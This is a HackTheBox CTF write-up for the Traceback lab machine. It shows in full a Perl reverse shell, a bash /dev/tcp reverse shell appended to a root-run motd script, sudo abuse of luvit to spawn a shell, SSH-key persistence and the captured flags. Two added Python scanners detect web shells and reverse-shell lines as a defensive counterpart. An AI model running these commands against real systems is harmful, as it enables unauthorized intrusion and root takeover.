
HackTheBox Traceback Write Up w/o Metasploit

18 Aug 2020

Traceback is an easy Linux box created by Xh4H. You get in through a web shell that was planted on the server, land as webadmin, escalate privileges to sysadmin with lua/luvit, and echo a reverse shell into the 00-header file to get root access. If you have any questions you can find me on Twitter @ajdintrejic.

Reconnaissance

Let’s run a quick nmap scan, and a full nmap scan in the background:

#top 1000 ports
sudo nmap -sV -sC -O -oA nmap/initial 10.10.10.181

#all ports
sudo nmap -p- -sV -sC -O -oA nmap/full 10.10.10.181  

We have a web page on port 80:

There is no robots.txt, but there is a comment that might be useful.

I also ran gobuster:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.181 -x php,html -t 100

But before it finished I had already found the next step. It also produced a lot of errors (due to my bad connection), so I won’t paste the output here; it’s not important.

Getting user

From that comment we can assume the hacker left a web shell behind. Googling the comment leads to a repo containing some web shells.

I tried opening each of them at 10.10.10.181/<shell.php>; only smevk.php gave me a login prompt.

Smevk.php

Let’s open that

I got in with admin:admin.

We have entered the system and we are webadmin now. Next we should try to get a reverse shell so we can work on escalating privileges to a user account.
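The box was compromised through a web shell dropped into the web root, so the defender's counterpart to this step is checking the web root for files like it. The scanner below is an added example, not code from the original write-up or from the box: it flags PHP files whose code passes request data ($_GET, $_POST, $_REQUEST, ...) into an execution sink such as system() or eval(), and flags file names on a small known-shell list (smevk.php is the one found here). The sample web root it scans is constructed in a temporary directory.

```python
"""Scan a web root for PHP files that look like dropped web shells.

Added example (not part of the original write-up). Heuristic only: a hit
means "look at this file", not "this is malicious".
"""
import os
import re
import tempfile

# Execution sinks a PHP web shell typically calls.
SINKS = ("system", "exec", "shell_exec", "passthru", "eval", "popen", "proc_open", "assert")
# Superglobals that carry attacker-controlled request data.
SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER)"

# A sink whose argument list (up to the statement end) contains request data,
# e.g. system($_GET['cmd']) or eval(base64_decode($_POST['x'])).
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\([^;]*" + SOURCES)

# File names of known dropped shells; smevk.php is from this box, extend from your own IOC list.
KNOWN_SHELL_NAMES = {"smevk.php"}


def scan_php_source(text):
    """Return (line_number, sink_name) for every suspicious call in one PHP file."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = SINK_RE.search(line)
        if m:
            hits.append((lineno, m.group(1)))
    return hits


def scan_webroot(root):
    """Walk root and return {relative_path: [reasons]} for files worth a closer look."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            reasons = []
            if name.lower() in KNOWN_SHELL_NAMES:
                reasons.append("known web shell file name")
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, sink in scan_php_source(fh.read()):
                    reasons.append(f"line {lineno}: {sink}() fed by request data")
            if reasons:
                findings[rel] = reasons
    return findings


def demo():
    """Build a constructed web root, scan it and return the findings dict."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        # Legitimate page: system() is called, but with a constant, not request data.
        "index.php": "<?php\necho 'Welcome';\n$x = system('uptime');\n",
        # Constructed shell-like file: a request parameter reaches system().
        "uploads/cmd.php": "<?php\nif (isset($_REQUEST['c'])) { system($_REQUEST['c']); }\n",
        # Flagged on the file name alone.
        "smevk.php": "<?php\n// contents irrelevant for the name check\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_webroot(root)


if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Run it against a real web root with `scan_webroot("/var/www/html")`; the regex is deliberately simple and will miss obfuscated shells, so treat it as triage alongside file mtimes and integrity checks, not as a verdict.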

Reverse shell as webadmin

I couldn’t get it to work with nc, but I did with a perl reverse shell script from here.

Start a nc listener for reverse shell on your local machine (I used port 1233) with:

sudo nc -lvnp 1233 

On the backdoor web page execute the payload, but make sure to edit the IP and port first.

perl -e 'use Socket;
$i="10.10.15.209";
$p=1233;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){
	open(STDIN,">&S");
	open(STDOUT,">&S");
	open(STDERR,">&S");
	exec("/bin/sh -i");
};'

After executing that command we get a sh shell as webadmin:

We can cat /etc/passwd and see that we have to get into the sysadmin account.

sysadmin:x:1001:1001::/home/sysadmin:/bin/sh

ssh-keygen

Let’s create our ssh keys while we’re here.

$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/webadmin/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/webadmin/.ssh/id_rsa.
Your public key has been saved in /home/webadmin/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:Yt9f+khAXW3DKXb83bieDKCgScOpwFjMwx7+uiZYZBY webadmin@traceback
The key's randomart image is:
+---[RSA 2048]----+
| +            +..|
|  E        . + *o|
|o+ = .    . o oo=|
|o.* = .  ..   . +|
| = + +o.S...   . |
|  o +. o.. .. .  |
|.. .    . . .+.. |
|o o        o ++  |
| o..        +..  |
+----[SHA256]-----+

Copy the private key id_rsa to your machine and add the public key id_rsa.pub to authorized_keys with:

echo "\n\n" >> authorized_keys
cat id_rsa.pub >> authorized_keys

We can ssh into the box now.

Enumeration

On your local machine, grab linpeas.sh and LinEnum.sh, put them in a new folder and serve that folder over HTTP.

Then we can fetch the files and run them on the server. I created /tmp/ajdin and pulled the files with wget:

wget http://10.10.15.209:1232/LinEnum.sh
wget http://10.10.15.209:1232/linpeas.sh

Looking at the output of linpeas.sh I found three things:

We can check out the note first:

$ cat /home/webadmin/note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

Okay, let’s remember Lua and carry on. The /etc/update-motd.d/ dir contains a script file, 00-header:

$ cat 00-header
<removed, not important>[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\nWelcome to Xh4H land \n"

But wait, we’ve seen this text before: it was printed when we ssh’d into the box.

So can we get code execution as root here? First let’s get the sysadmin account so we can write to this file. That leaves the SUID binary, which has no entry in GTFOBins, but we can Google it and see what it does.

Luvit privilege escalation

Wait, so it has something to do with Lua? If we check lua on GTFOBins, we see we can spawn a shell and escalate privileges with:

lua -e 'os.execute("/bin/sh")'

But we have luvit, so let’s try:

$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/sh")'
sh: turning off NDELAY mode
whoami
sysadmin

We can now get the flag and continue:

cat user.txt
addd2ba938b3b4bf2e15374f413aee04

Getting Root

Amazing. Now let’s get back to that /etc/update-motd.d/ dir as sysadmin and try to get code execution as root:

$ echo "whoami" >> 00-header

For some reason you can’t set up ssh keys for this user. Anyway, we’ll insert the bash reverse shell payload into 00-header.

First start a netcat listener on port 1250 with nc -lvnp 1250. Now insert the reverse shell payload:

echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.136/1250 0>&1'" >> 00-header

Then log back in over ssh. The motd script runs, and now our netcat listener has a shell.

root@traceback:/# cat /root/root.txt
2218cd7369604176712a79ad09dd5414
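The root step works because the scripts in /etc/update-motd.d are run with root privileges at every SSH login, so a script that a lower-privileged account can write to is a root code-execution path. The audit below is an added example, not code from the original write-up or from the box: it reports every file in a motd directory that is not owned by the trusted uid or is group/world writable, and it also prints lines that look like a reverse shell (references to /dev/tcp, nc or bash -i, which have no business in a login banner). The sample directory it checks is constructed in a temporary directory; the appended line in the constructed 00-header is the one from this write-up.

```python
"""Audit an update-motd.d directory for scripts a non-root user could edit
or has already tampered with.

Added example (not part of the original write-up). Run it on a real host as
audit_motd_dir("/etc/update-motd.d"); the demo uses a constructed temp dir.
"""
import os
import re
import stat
import tempfile

# Things that should never appear in a login banner script.
SUSPICIOUS_LINE = re.compile(r"/dev/tcp/|\bnc\b|\bncat\b|\bbash\s+-i\b")


def audit_motd_dir(directory, trusted_uid=0):
    """Return a list of (filename, issue) for every problem found in directory.

    Checks, per regular file: owner is trusted_uid (root on a real system),
    no group/world write bit, and no reverse-shell-looking content.
    """
    issues = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        st = os.stat(path)
        if st.st_uid != trusted_uid:
            issues.append((name, f"owned by uid {st.st_uid}, expected {trusted_uid}"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            issues.append((name, f"group/world writable (mode {stat.S_IMODE(st.st_mode):04o})"))
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, start=1):
                if SUSPICIOUS_LINE.search(line):
                    issues.append((name, f"line {lineno} looks like a reverse shell: {line.strip()}"))
    return issues


def demo():
    """Build a constructed motd directory and audit it.

    The files are owned by whoever runs this script, so the demo passes
    os.getuid() as the trusted owner; on a real host leave the default (0).
    """
    directory = tempfile.mkdtemp(prefix="update-motd.d_")

    # Constructed 00-header: the banner from the box, plus the appended payload
    # line quoted in the write-up. Group writable, as it was for sysadmin.
    header = os.path.join(directory, "00-header")
    with open(header, "w", encoding="utf-8") as fh:
        fh.write("#!/bin/sh\n")
        fh.write("[ -r /etc/lsb-release ] && . /etc/lsb-release\n")
        fh.write('echo "\\nWelcome to Xh4H land \\n"\n')
        fh.write("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.136/1250 0>&1'\n")
    os.chmod(header, 0o664)

    # Constructed clean script with sane permissions: should produce no issues.
    clean = os.path.join(directory, "10-help-text")
    with open(clean, "w", encoding="utf-8") as fh:
        fh.write("#!/bin/sh\nprintf 'Documentation: https://help.ubuntu.com\\n'\n")
    os.chmod(clean, 0o755)

    return audit_motd_dir(directory, trusted_uid=os.getuid())


if __name__ == "__main__":
    for name, issue in demo():
        print(f"{name}: {issue}")
```

The ownership and mode checks are the preventive half (fix with chown root and chmod 755 before anyone appends to the file); the content check is the detective half, useful in a post-incident sweep of hosts where the banner scripts were never baselined.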

Thanks for reading. If you have any questions feel free to reach out to me on Twitter @ajdintrejic.
